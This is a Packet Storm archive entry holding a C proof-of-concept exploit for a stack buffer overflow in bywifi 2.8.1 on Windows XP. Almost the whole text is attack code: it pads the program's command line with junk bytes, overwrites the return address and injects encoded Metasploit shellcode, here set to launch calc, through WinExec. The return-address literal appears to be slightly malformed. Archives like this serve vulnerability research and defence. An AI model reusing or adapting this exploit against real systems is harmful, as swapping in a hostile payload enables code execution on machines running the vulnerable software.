Bywifi 2.8.1 Stack Buffer Overflow

2011-01-02T00:00:00
ID PACKETSTORM:97202
Type packetstorm
Reporter Packet Storm
Modified 2011-01-02T00:00:00

Description

                                        
                                            `# Exploit Title: [bywifi 2.8.1 stack buffer overflow]  
# Author: [Anonymous]  
# Software Link: [bywifi.com]  
# Version: [2.8.1]  
# Tested on: [windows xp Professional French ]  
# CVE : [N/a]  
  
#include <windows.h>  
#include <string.h>  
#include <stdio.h>  
int main()  
{  
//file name  
char exploit[700]="bywifi.exe ";  
//ret addr  
char ret[] = "x5D\x38\x82\x7C";  
//junk data  
char overflow[260];  
for(int i=0;i<260;i++){  
overflow[i]=0x41;  
}  
/*  
* windows/exec - 144 bytes  
* http://www.metasploit.com  
* Encoder: x86/shikata_ga_nai  
* EXITFUNC=process, CMD=calc  
*/  
char shellcode[] =  
"\xbf\xdb\xf9\x8c\x6d\x31\xc9\xb1\x1e\xda\xcd\xd9\x74\x24\xf4"  
"\x58\x31\x78\x0f\x03\x78\x0f\x83\xe8\x27\x1b\x79\x91\x3f\x98"  
"\x82\x6a\xbf\xaa\xc6\x56\x34\xd0\xcd\xde\x4b\xc6\x45\x51\x53"  
"\x93\x05\x4e\x62\x48\xf0\x05\x50\x05\x02\xf4\xa9\xd9\x9c\xa4"  
"\x4d\x19\xea\xb3\x8c\x50\x1e\xbd\xcc\x8e\xd5\x86\x84\x74\x12"  
"\x8c\xc1\xfe\x45\x4a\x08\xea\x1c\x19\x06\xa7\x6b\x42\x0a\x36"  
"\x87\xf6\x2e\xb3\x56\xe2\xc7\x9f\x7c\xf0\x14\x40\x4c\x0e\xfa"  
"\x29\xca\x65\xbc\xe5\x99\x3a\x4c\x8d\xee\xa6\xe1\x1a\x66\xdf"  
"\x70\xe4\xf4\x1f\xe8\x45\x93\x6f\x66\x61\x3c\xf8\xee\x94\x48"  
"\xf6\x59\x96\xaa\x64\x04\x04\x56\x6b";  
printf("Exploiting ......\n");  
strcat(exploit, overflow);  
strcat(exploit, ret);  
strcat(exploit, shellcode);  
WinExec(exploit,0);  
printf("Exploitation Finished\n");  
return 0;  
}   
  
`